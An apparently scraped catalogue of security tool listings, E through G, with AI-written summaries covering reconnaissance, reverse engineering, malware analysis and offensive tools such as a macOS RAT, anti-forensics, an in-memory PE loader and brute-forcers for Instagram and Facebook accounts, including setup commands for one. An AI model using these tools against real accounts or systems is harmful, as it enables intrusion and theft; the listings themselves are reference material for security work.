AI Summary: EpicGames-FreeGames-Node is an automated tool designed to log into the Epic Games Store and identify available free games efficiently. Its primary use case is to simplify the process of retrieving checkout links for free games across multiple user accounts and can be executed on a scheduled basis. Notable features include support for JSON configuration, multiple notification mechanisms (such as email, Discord, and Telegram), and the ability to handle device code authentication for logging in.

ESP32-DIV

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: ESP32-DIV is an open-source multi-band wireless toolkit based on the ESP32, designed for wireless testing, signal analysis, jammer development, and protocol spoofing across Wi-Fi, BLE, 2.4GHz, and Sub-GHz frequency bands. Notable features include real-time packet monitoring, Wi-Fi deauthentication attacks, Bluetooth advertisement spoofing, and Sub-GHz command replay capabilities. The toolkit is intended strictly for educational and research purposes to ensure ethical usage in wireless security assessments.

README

ESP32-DIV

ESP32DIV - Advanced Wireless Toolkit

espoofer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: espoofer is an open-source tool designed to assess vulnerabilities in email systems related to SPF, DKIM, and DMARC authentication protocols. It aims to aid mail server administrators and penetration testers in identifying potential weaknesses that could be exploited for email spoofing attacks. Notable features include three operational modes—server, client, and manual—that facilitate comprehensive testing of both sending and receiving services.

README

espoofer

espoofer is an open-source testing tool to bypass SPF, DKIM, and DMARC authentication in email systems. It helps mail server administrators and penetration testers to check whether the target email server and client are vulnerable to email spoofing attacks or can be abused to send spoofing emails.

ethereum-lists

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ethereum-lists is a collaborative repository that maintains and updates lists of malicious URLs, fake token addresses, Ethereum addresses, and contract details, facilitating community contributions through pull requests. Its primary use case is to serve as a resource for users to identify and avoid phishing attempts and fraudulent tokens within the Ethereum ecosystem. Notable features include an easily accessible structure for submitting changes and clear guidelines for contributions, promoting community involvement in enhancing security awareness.

Ethical-Hacking-Labs

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ethical Hacking Labs is a comprehensive educational resource designed for students and professionals in the cybersecurity field, providing a hands-on approach to learning ethical hacking techniques. It includes a series of tutorials that cover essential topics such as networking, system administration, and various ethical hacking methodologies, from basic to advanced practices. Notable features include practical labs, foundational modules on core knowledge, and guidance on using tools like Metasploit, Maltego, and Recon-ng for effective penetration testing and reconnaissance.

Ethical-Hacking-Tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ethical-Hacking-Tools is a repository that provides a curated collection of tools and resources for ethical hacking and penetration testing. Its primary use case is to assist cybersecurity professionals in identifying and addressing vulnerabilities within computer systems and networks. Notable features include links to various Linux distributions optimized for security testing, such as Kali Linux and Parrot OS, along with educational content on hacking practices and hacker classifications.

README

Ethical-Hacking-Tools

evil-winrm

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Evil-WinRM is a versatile Ruby-based tool designed for penetration testing that facilitates remote command execution via Windows Remote Management (WinRM) protocol. It supports advanced features such as in-memory script and DLL execution, pass-the-hash and Kerberos authentication, SSL, and customizable logging, making it particularly effective for post-exploitation scenarios. The tool is compatible with both Linux and Windows clients, providing a robust interface for querying and managing remote Windows systems while bypassing some antivirus defenses.

evillimiter

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Evil Limiter is a network management tool designed to monitor, analyze, and control the bandwidth of devices on a local network without needing physical or administrative access. Utilizing ARP spoofing and traffic shaping techniques, it enables users to throttle upload and download speeds for specific hosts, block internet connections, and manage network resources effectively through a command-line interface. Notable features include automatic network configuration detection, the ability to scan IP ranges, and manage hosts dynamically with various commands for limiting and unblocking access.

EvilOSX

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: EvilOSX is a Remote Administration Tool (RAT) designed for macOS that enables stealthy monitoring and control of compromised systems. It boasts features such as terminal emulation, module extensibility, and the ability to retrieve sensitive user data like passwords and iCloud tokens, all while remaining undetected by antivirus solutions through encrypted payloads. Additionally, it includes functionalities for taking screenshots, recording audio, and executing local privilege escalation attempts, making it a potent tool for unauthorized system access and data exfiltration.

evilwaf

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: EvilWAF is a sophisticated transparent MITM Firewall bypass proxy and deep WAF vulnerability scanner designed for authorized security testing purposes. It operates at the transport layer, allowing seamless integration with various security tools while employing advanced techniques such as TCP and TLS fingerprint rotation, source port manipulation, and automated WAF detection to evade defensive mechanisms. Notable features include a comprehensive multi-layer WAF scanning capability, direct origin bypass, and a robust IP rotation strategy through Tor and proxy pools, ensuring effective assessment of firewall vulnerabilities.

Exegol

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Exegol is a modular cybersecurity environment tailored for offensive security professionals, addressing traditional security distribution challenges. Its primary use case is for hackers and security experts who require a reliable toolkit for field operations. Notable features include its customizable structure and community-driven design, enhancing usability and effectiveness in practical cybersecurity applications.

README

Exegol is a comprehensive cybersecurity environment designed by offensive security experts, for fellow hackers, with its community. It solves the common pain points of traditional security distributions by providing a modular and reliable toolkit that’s made for the field.

exphub

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Exphub is a vulnerability exploitation script repository containing various Proof of Concept (PoC) and exploit scripts for commonly exploited vulnerabilities across platforms like Weblogic, Struts2, Tomcat, and Drupal. It includes detailed usage documentation for a wide range of scripts, such as remote command execution (RCE) and Webshell uploader scripts, all of which have been tested for effectiveness. The tool aims to streamline the process of vulnerability scanning and exploitation by consolidating multiple scripts for easy access and execution.

exploitnotes

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Exploit Notes is a comprehensive resource platform designed for security research, focusing on hacking techniques and tools applicable to penetration testing, bug bounty programs, and Capture The Flag (CTF) challenges. It encompasses a wide array of topics including reconnaissance, various operating systems, web applications, databases, networks, and emerging technologies such as AI and blockchain. Users can leverage this repository for educational purposes, with the option to run it locally via a straightforward setup process.

extract_otp_secrets

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The extract_otp_secrets tool is a Python script designed to extract one-time password (OTP) secrets from QR codes generated by two-factor authentication applications, such as Google Authenticator. It supports multiple input methods, including live capture from a camera, image files, and text files from external QR code readers, while allowing users to export the extracted secrets to JSON or CSV formats or print them as QR codes. Notable features include a built-in GUI for live QR code capture and flexible output options.

eyeballer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Eyeballer is a tool designed for large-scope network penetration testing, specifically aimed at identifying potentially vulnerable web hosts from a vast collection of screenshots. It employs machine learning to classify sites into categories such as “Old-Looking Sites,” “Login Pages,” and “Parked Domains,” allowing users to prioritize targets based on their likelihood of containing vulnerabilities. Notable features include support for GPU usage, a user-friendly setup process, and integration with popular screenshotting tools like EyeWitness and GoWitness.

f8x

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: f8x is an automated deployment tool focused on Infrastructure as Code (IaC) that leverages Terraform and Wails to facilitate multi-cloud deployment and project orchestration. Its primary use case includes setting up various environments for Red/Blue team operations, providing options for batch installations of essential tools, and deploying specific environments such as CTFs and middleware with minimal dependencies. Notable features include a variety of installation options for development and pentesting environments, and full compatibility with multiple Linux distributions.

Facebook-BugBounty-Writeups

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The Meta(Facebook) Bug Bounty Writeups repository compiles a collection of documented vulnerabilities discovered on Facebook, showcasing varying bounty rewards ranging from account takeovers to remote code execution. Its primary use case is to serve as a resource for security researchers and ethical hackers to share and learn from reported vulnerabilities in Meta’s platforms. Notable features include a chronological organization of writeups, contributing guidelines, and links to detailed analysis articles for each reported bug.

fail2ban

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fail2Ban is a security tool that monitors log files for multiple failed authentication attempts, automatically banning IP addresses that exceed a specified threshold by updating firewall rules. It supports various standard log files, including those from SSH and Apache, and can be configured to monitor custom log files as needed. Notable features include its capability to work with both IPv4 and IPv6 addresses, and a client-server architecture for managing configurations and interactions.

fame

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FAME (FAME Automates Malware Evaluation) is a Python-based framework designed to automate and enhance the analysis of malicious files, enabling analysts to quickly identify malware families and extract relevant configurations and indicators of compromise (IOCs). The tool utilizes Flask for its web interface and Celery for managing background tasks, streamlining the end-to-end analysis process. FAME aims to empower malware analysis efforts by providing an efficient and user-friendly solution for processing malware samples.

faraday

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Faraday is an open-source vulnerability management tool designed to facilitate the organization, aggregation, and visualization of security data in a multiuser environment. Its primary use case is to streamline vulnerability discovery and management by integrating various community tools while providing insightful visualizations for both managers and analysts. Notable features include its command-line interface for direct terminal access, support for multiple installation methods (including Docker and PyPi), and the ability to automate scanning tools within CI/CD pipelines.

fav-up

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fav-up is a tool that leverages favicon icons to identify real IP addresses using the Shodan API. It supports multiple lookup methods, including local files, URLs, and domain searches, and can output results in CSV or JSON formats. Key features include customizable API key input options, support for batch processing via input lists, and the ability to retrieve detailed information such as favicon hashes and associated masked IPs.

FavFreak

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FavFreak is a reconnaissance tool that streamlines the process of gathering information using favicon hashes from a list of URLs. It fetches the favicon.ico for each URL, computes its hash, and matches it against a predefined fingerprint dictionary to identify known services. Key features include sorting results by favicon hashes and generating Shodan dorks, making it a valuable asset for bug bounty hunters and OSINT investigations.

README

FavFreak - Weaponizing favicon.ico for BugBounties , OSINT and what not

FBI-tools

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FBI-tools is a comprehensive Open Source Intelligence (OSINT) toolkit featuring a variety of tools for analysts to gather and analyze data from multiple online sources. Its notable features include domain squatting detection with SquatSquasher, web reconnaissance capabilities with reNgine, and efficient user account searches across platforms using UsernameSearchOSINT. Additionally, the collection encompasses specialized tools for investigating social media, phone numbers, and dark web intelligence, streamlining the OSINT process.

featherduster

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FeatherDuster is a cryptographic analysis tool designed to facilitate the identification and exploitation of weaknesses in cryptosystems, leveraging its underlying library, Cryptanalib. It offers capabilities for automatic encoding detection and decoding, interaction with multiple ciphertext formats, and supports various cryptographic analysis functions, making it suitable for both researchers and practitioners in the field of cryptography. The tool aims to simplify the process of analyzing flawed cryptographic implementations, while Cryptanalib serves as a flexible engine for developing custom crypto attack methods.

fernflower

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fernflower is an analytical decompiler for Java, capable of converting compiled Java class files back into human-readable source code. It is integrated within IntelliJ IDEA for debugging and navigation, and can also be executed from the command line to decompile class files, ZIPs, and JARs, offering numerous customizable command-line options to fine-tune the decompilation process. Notable features include support for decompiling inner classes, handling generic signatures, and options for renaming identifiers based on debugging information.

FilelessPELoader

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FilelessPELoader is a tool designed to load and execute AES-encrypted Portable Executable (PE) files directly into memory, bypassing the need for traditional file storage. Its primary use case is to facilitate stealthy execution of payloads in memory, enhancing evasion techniques commonly utilized in cybersecurity attacks. Notable features include the ability to decrypt the PE file in-memory and execute it without leaving traces on disk.

README

FilelessPELoader

Loading Remote AES Encrypted PE in memory , Decrypted it and run it

FinalRecon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FinalRecon is an automated web reconnaissance tool designed to efficiently gather comprehensive information about a target in a short time, maintaining high accuracy without the overhead of multiple dependencies. Notable features include detailed data collection on headers, WHOIS, SSL certificate information, DNS enumeration, subdomain and directory enumeration, web crawling, and a port scanning functionality, all in one compact solution. This tool is especially useful for OSINT practitioners seeking quick and reliable data during the reconnaissance phase of security assessments.

Findomain

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Findomain is a comprehensive domain recognition tool designed for efficient subdomain enumeration and monitoring. It utilizes Certificate Transparency Logs and various APIs to discover subdomains without brute-force methods, supports multi-threading for quick searches, and offers integration with notification services such as Discord and Slack. Notable features include DNS over TLS support, parallel resolution capabilities, and extensive configuration options across multiple formats.

README

Firecrack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Firecrack is a multi-functional penetration testing tool designed for exploiting vulnerabilities in websites and Facebook accounts. Its primary use cases include executing brute force attacks on Facebook accounts, finding administrative panels, performing Bing dorking for domain collection, and facilitating website defacement using the file upload method. Notable features include the ability to conduct random attacks on multiple Facebook accounts and an integrated admin finder tool.

README

Firecrack :fire:

What is firecrack tools ? Firecrack tools are tools for testing and testing on websites or Facebook accounts, conducting
testing on hundreds of Facebook accounts with random accounts and random wordlist, and there are
for testing websites, such as admin finder and deface with file upload method, and Bing dorking
to collect Many domains, Bing Dorking is useful if you are collecting a lot of domains.
more tools: :point_down:

firecrack fiture:

FISSURE

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FISSURE is an open-source RF framework designed for signal understanding and reverse engineering, catering to both operational and educational needs. It enables users to detect, classify, and manipulate RF signals, perform automated vulnerability testing, and integrate with TAK for real-time situational awareness. Key features include support for various deployment options, from desktop GUIs to headless nodes, and a robust plugin ecosystem for enhanced functionality.

README

FISSURE - The RF Framework

Frequency Independent SDR-based Signal Understanding and Reverse Engineering

flare-emu

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: flare-emu is an advanced emulation tool that integrates with binary analysis frameworks such as IDA Pro or Radare2, leveraging the Unicorn emulation framework to facilitate flexible and efficient code analysis. It offers multiple interfaces for emulating instruction ranges, iterating through function paths, and handling complex emulation scenarios, making it suitable for deep analysis of executable binaries across various architectures including x86, ARM, and their 64-bit counterparts. Notably, it provides functionalities for user-defined hooks, direct memory manipulation, and dynamic code discovery, enhancing the analyst’s ability to probe and understand obfuscated or complex binaries.

flask-session-cookie-manager

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Flask Session Cookie Manager is a Python tool that encodes and decodes Flask session cookies, facilitating easier management of session data. It offers commands for encoding session information into a cookie format and decoding existing cookies back into a readable structure, with support for both Python 2 and 3. Notable features include optional secret key usage for secure operations and clear command-line arguments for encoding and decoding tasks.

FLIRTDB

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FLIRTDB is a repository for storing and sharing signature files generated using the Fast Library Identification and Recognition Technology (FLIRT) used by IDA for identifying and renaming known library subroutines in disassembled binaries. Its primary use case is to alleviate the challenges faced by reverse engineers who require signature files for various library versions that may not be provided by Hex-Rays, allowing for easier analysis of symbol-stripped binaries. Notable features include community contributions for generating and organizing signatures, support for conflict management, and adherence to ethical submission guidelines.

flowsint

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Flowsint is an open-source OSINT graph exploration tool designed to facilitate ethical investigations by visualizing relationships between entities in a graph format. Its primary use case is in reconnaissance tasks, providing a suite of automated enrichers for domains, IPs, social media, organizations, and more, thus allowing users to gather comprehensive intelligence efficiently while ensuring data privacy by storing everything locally. Notable features include advanced enrichers for domain and IP investigations, as well as integrations for broader workflow connectivity.

fofa_viewer

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fofa Viewer is a user-friendly FOFA client developed in JavaFX, designed for cybersecurity professionals to efficiently search for vulnerabilities on target websites using the FOFA search engine. Key features include multi-tab query result display, Excel export capabilities, intelligent input suggestions, and advanced functionalities such as certificate conversion and exclusion of honeypots for premium members. This tool streamlines the information gathering process for penetration testers with its robust API integration and customizable configurations.

Forensia

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Forensia is an anti-forensics tool designed for red teamers to eliminate traces during the post-exploitation phase. Its primary use case is to enhance evasion by supporting various functionalities such as unloading Sysmon drivers, employing the Gutmann method for file shredding, and disabling multiple logging mechanisms. Notable features include log erasure, file melting capabilities, and the ability to clear recent user activity and cache, thereby reducing the likelihood of detection by incident response teams.

Free-Auto-GPT

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Free-Auto-GPT is an open-source implementation of autonomous AI agents like Auto-GPT and BabyAGI, designed to operate without paid APIs, thus enabling users to leverage advanced AI capabilities at no cost. Its notable features include easy integration with the Hugging Face and ChatGPT ecosystems, allowing users to access a variety of AI models without significant hardware requirements or financial constraints. This democratizes AI technology, making it accessible for small businesses and individuals seeking to innovate without hefty investments.

free-one-api

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: free-one-api is a flexible API tool that allows users to access various large language model (LLM) reverse engineering libraries via a standard OpenAI API format. Its primary use case is facilitating seamless interactions with multiple LLMs while providing notable features such as automatic load balancing, web UI support, streaming mode, and a heartbeat detection mechanism to ensure reliability. Additionally, it enables contributors to expand its functionality by testing and integrating new adapters.

frida-ios-dump

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: frida-ios-dump is a tool designed for extracting decrypted IPA files from jailbroken iOS devices. The primary use case involves leveraging Frida to automate the process of dumping application binaries, making it particularly useful for security researchers and developers analyzing iOS applications. Notable features include support for both Python 2.x and 3.x, as well as a straightforward command-line interface for initiating the dump process with either the display name or bundle identifier of the target app.

frida-ios-hook

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Frida iOS Hook is a Python-based tool designed for dynamic analysis and function hooking of iOS applications through Frida. Its primary use case involves tracing classes and functions, modifying method return values, and providing a suite of commands for process manipulation, memory dumping, and API interception. Notable features include support for both spawn and attach modes, an interactive CLI, and extensive options for script execution and device management.

Frida-Labs

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Frida-Labs is a repository designed to facilitate learning Frida for Android through a series of structured challenges, ranging from basic setup to intermediate-level tasks. The primary use case is to help users grasp the fundamentals of using Frida by engaging with practical scenarios that involve hooking methods, changing variable values, and native function invocation. Notable features include a variety of challenges, organized solutions, and an emphasis on understanding Frida scripts, making it an ideal starting point for beginners.

frida-scripts

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The frida-scripts repository provides a collection of instrumentation scripts designed for reverse engineering applications on iOS, Android, and Linux platforms using the Frida tool. Key features include full-featured tracers and enumerators for Objective-C, Java, and Linux binaries, enabling deep analysis and manipulation of app behaviors. The scripts may require customization and are suitable for advanced users involved in mobile and software security research.

README

frida-scripts

A collection of my Frida.re instrumentation scripts to facilitate reverse engineering of mobile apps and more.

fridare

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fridare is an automation tool for modifying the Frida server on iOS, Android, Linux, and Windows platforms, designed to enhance security and flexibility by allowing users to change server names and ports while bypassing jailbreak detection. The tool features a dual-mode interface, offering both a robust command line and a modern graphical user interface (GUI) based on the Fyne framework, facilitating intuitive server modifications and visual feedback. Notable functionalities include cross-platform support, binary replacement, custom packaging, and dependency management, making it a comprehensive solution for Frida users across different environments.

fscan

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fscan is a comprehensive internal network scanning tool designed for automated vulnerability assessment and information gathering. Its primary use case encompasses host discovery, port scanning, credential brute-forcing across various protocols, system vulnerability detection, and web application scanning, including comprehensive support for various databases and frameworks. Notable features include the ability to exploit vulnerabilities such as MS17-010, SSH remote command execution, and the storage of scan results for further analysis.

fsociety

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: fsociety is a modular penetration testing framework designed to assist cybersecurity professionals in conducting security assessments. Notable features include a command-line interface with options for retrieving information and suggesting tools, as well as support for installation via pip and Docker. The framework’s modular approach allows users to integrate various tools for comprehensive security testing.

README

fsociety

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fsociety is a comprehensive penetration testing framework designed to provide a wide array of hacking tools utilized in the Mr. Robot series. It features modules for information gathering, password attacks, wireless testing, exploitation, web hacking, and post-exploitation, all implemented in Python 2, with detailed installation instructions for various platforms, including Docker support. Notable tools included are Nmap, sqlmap, WPScan, and several others tailored for diverse security testing scenarios.

fuxploider

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Fuxploider is an open-source penetration testing tool designed to automate the detection and exploitation of vulnerabilities in file upload forms. Its primary use case is to identify permissible file types and effectively upload web shells or malicious files to targeted web servers using optimized techniques. Notable features include support for Python 3.6 and the ability to utilize Docker for installation, providing flexibility across different environments.

README

fuxploider

fuzzDicts

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: fuzzDicts is a comprehensive web penetration testing dictionary tool designed for security professionals to enhance fuzzing and brute-force attacks. It features an extensive collection of payloads, username lists, and weak password dictionaries, regularly updated to include specific vulnerabilities across different systems, including Unix and Windows. Notable features include categorized dictionaries for remote code execution, XSS attacks, and various common website directories, making it a valuable resource for security testing and exploitation.

fuzzforge_ai

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: FuzzForge AI is an open-source orchestration platform that leverages AI agents to automate security research workflows via the Model Context Protocol (MCP). It enables seamless interaction with containerized security tools, allowing AI agents to discover, chain, and execute tasks for vulnerability assessment and analysis autonomously. Notable features include a hub architecture for tool discovery, support for AI-native workflows, and the capability to create automated pipelines tailored for specific use cases such as firmware vulnerability research or Rust fuzzing.

Galaxy-Bugbounty-Checklist

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Galaxy Bugbounty Checklist is a comprehensive tool designed to aid bug bounty hunters by providing an organized and detailed checklist of security assessment techniques. It includes specific references for various testing methodologies such as Account Takeover, CSRF Bypass, and OSINT, making it an essential resource for systematic vulnerability evaluation. Notable features include its structured format and accessibility for users to seek assistance directly through the provided contact.

README

Notes

Try to make best Bug Bounty Checklist.
All checklists come with references.
Feel free to contact me maximus0xday [at] gmail if you have any question.

To do list:

GalaxyBudsClient

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GalaxyBudsClient is an unofficial management tool for Samsung Galaxy Buds, providing users with enhanced control and configuration options via a desktop interface across Windows, macOS, Linux, and Android. Notable features include detailed battery statistics, customizable touch actions, diagnostics and self-tests, and the ability to flash or downgrade firmware, unlocking the full potential of Galaxy Buds devices.

README

English | 中文(简体) | 中文(繁體) | Русский | 日本語 | Українська | 한국어 | Česky | Türkçe | Ελληνικά | Português | Tiếng Việt
_{Attention: readme files are maintained by translators and may become outdated from time to time. For the newest info rely on the English version.}

game-hacking

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “Ultimate Game Hacking Resource” repository is a comprehensive compilation of tools and tutorials designed for the reverse engineering of video games. It provides a variety of game hacking tools such as disassemblers, debuggers, and memory scanners, while also serving as a knowledge base for related methodologies and practices. Notably, it continuously updates its resource list, welcoming community contributions to enhance its offerings.

README

This repo is sponsored by GuidedHacking.com!

The Ultimate Game Hacking Resource

A curated list of tools, tutorials, and much more for reverse engineering video games!

game-reversing

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: The “kovidomi/game-reversing” repository offers a curated collection of learning materials aimed at facilitating the reverse engineering of video games, particularly for those targeting PC games on the Windows platform using x86 assembly language. It emphasizes essential tools and skills, including Cheat Engine, IDA, and Ghidra, while providing a structured learning pathway that covers foundational knowledge in computing, game programming, and Windows internals. Noteworthy features include a focus on practical resources and a directive to understanding specific game engines, useful for effective reverse engineering.

GameTracking-CS2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GameTracking-CS2 is a tool designed to automate the tracking of in-game statistics and events for Counter-Strike 2, thereby reducing the manual effort involved in monitoring gameplay data. It provides seamless integration with existing GameTracking functionalities, allowing users to monitor game performance effortlessly. Notable features include real-time tracking capabilities and community support through its Discord channel.

README

Game Tracker: Counter-Strike 2

Tracking things, so you don’t have to.

See readme in main GameTracking repository for more information on how files are tracked.

GameTracking-Dota2

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GameTracking-Dota2 is a tool designed to automate the tracking of in-game statistics and player performance in Dota 2. Its primary use case is to relieve players of the manual effort involved in monitoring game data, providing streamlined insights into gameplay trends. Notable features include integration with a broader GameTracking ecosystem and community support via Discord.

README

Game Tracker: Dota 2

Tracking things, so you don’t have to.

See readme in main GameTracking repository for more information on how files are tracked.

GARbro

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GARbro is a resource browser designed for Visual Novels, enabling users to browse and extract content from various archive formats. The tool supports a wide range of file types, allows file extraction and conversion to common formats, and provides a user-friendly interface with customizable hotkeys for efficient navigation and operation within file archives. Notably, it offers features for handling encrypted archives and manual file type assignment.

README

GARbro

Visual Novels resource browser.

Garud

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Garud is an automation tool designed for reconnaissance, specifically targeting sub-domain enumeration and vulnerability scanning for injection points such as XSS, SSRF, and SSTI. It integrates multiple popular bug bounty tools, including Assetfinder, Subfinder, and Nuclei, to streamline the scanning process, outputting results systematically while notifying the user upon completion. Notable features include the ability to filter and identify low-hanging vulnerabilities, along with systematic data collection and reporting functionalities.

gasmask

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GasMasK is an all-in-one open-source information gathering tool designed for Open Source Intelligence (OSINT) tasks. It facilitates data collection across various platforms such as Google, Shodan, and social media, allowing users to search for domains and extract relevant information through an extensive set of features, including customizable output formats and API integrations for enhanced functionality. The tool is built in Python and supports numerous search methods, making it a versatile choice for cybersecurity professionals conducting reconnaissance.

GDA-android-reversing-Tool

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GDA (GJoy Dex Analyzer) is a powerful Dalvik bytecode decompiler designed for fast analysis of APK, DEX, ODEX, OAT, JAR, CLASS, and AAR files, with minimal memory and disk consumption. It features advanced capabilities including malicious behavior detection, vulnerability scanning, path solving, and deobfuscation, as well as various utilities for interactive operation and assisted analysis. GDA operates natively without requiring a Java VM, making it suitable for use on various Windows systems and virtual machines.

geacon

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Geacon is a tool designed for implementing CobaltStrike’s Beacon using Go, primarily aimed at protocol analysis and reverse engineering. It supports CobaltStrike 4.1 and includes functionalities such as command execution, file upload/download, and directory navigation. The tool emphasizes learning and experimentation, with a strong caution against illegal use.

README

Geacon

Using Go to implement CobaltStrike’s Beacon

This project is for learning protocol analysis and reverse engineering only, if someone’s rights have been violated, please contact me to remove the project, and the last DO NOT USE IT ILLEGALLY

Gemini-API

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Gemini-API is an asynchronous Python wrapper for the Google Gemini web application, designed for generating and editing content through natural language queries. Key features include persistent cookie management, image generation capabilities, customization via system prompts and extensions, support for streaming output, and the ability to classify various types of responses. The tool is built on asyncio, ensuring efficient execution for always-on services and complex interactions.

README

GeoIntel

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GeoIntel is a Python tool leveraging Google’s Gemini API for AI-powered geolocation analysis of images, allowing users to identify the likely location where photos were taken. It features both a command-line interface and an interactive web interface with drag-and-drop functionality, real-time analysis, and support for additional context and location guesses. Notable capabilities include generating Google Maps links, providing confidence levels for predictions, and exporting results in JSON format.

geowifi

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: geowifi is a tool designed for querying WiFi geolocation data based on the BSSID or SSID from various public databases. Its primary use case is to facilitate the retrieval of network location information, providing output in either map or JSON format. Notable features include support for multiple APIs like Wigle, Google Geolocation, and Combain, enabling users to easily configure and access comprehensive WiFi data.

README

📡💘🌎 | geowifi

Search WiFi geolocation data by BSSID and SSID on different public databases.

Gepetto

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Gepetto is a Python plugin designed for integration with IDA Pro (≥ 7.6) that utilizes large language models to analyze and enhance decompiled functions. Its primary use case includes providing detailed explanations of function behavior and automatically renaming variables for clarity. Notable features include support for multiple AI models, including those from OpenAI, Google, and Azure, along with an easy installation process via the Hex-Rays CLI tool.

README

Gepetto

Gepetto is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.6). It can leverage them to explain what a function does, and to automatically rename its variables. Here is a simple example of what results it can provide in mere seconds:

getJS

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: getJS is a command-line tool and Go package designed for extracting JavaScript sources from URLs and HTTP responses, catering primarily to penetration testers, bug bounty hunters, and developers. Its notable features include customizable request options, support for input from files, and the ability to resolve relative URLs, enhancing the efficiency of JavaScript extraction processes.

README

JavaScript Extraction CLI & Package

This is a powerful tool for extracting JavaScript sources from URLs and web pages / HTTP responses. It offers a command-line interface (CLI) for straightforward URL processing and a package interface for custom integrations, making it ideal for pentesters, bug bounty hunters, and developers needing to extract JS sources efficiently.

GH05T-INSTA

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GH05T-INSTA is a cybersecurity tool designed for brute-force password recovery on Instagram accounts, suitable for both rooted and non-rooted Android devices. It features automatic IP address anonymization, error detection and resolution, and allows users to create custom password lists for enhanced effectiveness. While marketed as a hacking tool, the developers emphasize the legal implications and responsibility of ethical usage.

README

The best way to hack Instagram

New Working Tool Link : Click

Installation {Kali}

BruteForce (GH05T-INSTA)

apt install git

git clone https://github.com/GH05T-HUNTER5/GH05T-INSTA

cd GH05T-INSTA

sudo bash setup.sh

Configuring Tor server to open control port

Ghost

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: Ghost Framework is an Android post-exploitation framework that leverages the Android Debug Bridge to enable remote access to Android devices. Its primary use case is for penetration testing and security assessments of Android applications and devices. Notable features include ease of installation via pip and a focus on facilitating comprehensive exploitation scenarios.

README

Ghost Framework

Ghost Framework is an Android post-exploitation framework that
exploits the Android Debug Bridge to remotely access an Android device.

Installation

pip3 install git+https://github.com/EntySec/Ghost

GhostStrike

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GhostStrike is a sophisticated cybersecurity tool developed for Red Team operations, utilizing techniques such as process hollowing and dynamic API resolution to execute covert actions on Windows systems while evading detection. Its notable features include shellcode encoding/decoding, cryptographic key generation for enhanced security, and control flow flattening to complicate analysis efforts. Designed for educational use in controlled environments, GhostStrike emphasizes the importance of responsible usage.

README

GhostStrike ⚔️

GhostStrike is an advanced cybersecurity tool designed for Red Team operations, featuring sophisticated techniques to evade detection and perform process hollowing on Windows systems.

GhostTrack

Mon, 30 Mar 2026 00:00:00 +0000

AI Summary: GhostTrack is an OSINT tool designed for tracking the location or mobile number of targets, facilitating information gathering through various tracking functionalities. Its notable features include IP tracking, phone number tracking, and username tracking across social media platforms, allowing users to collect comprehensive data on their targets. The tool is straightforward to install on Linux or Termux and is continuously updated, with the latest version being 2.2.

README

GhostTrack

Useful tool to track location or mobile number, so this tool can be called osint or also information gathering

Ghostwriter

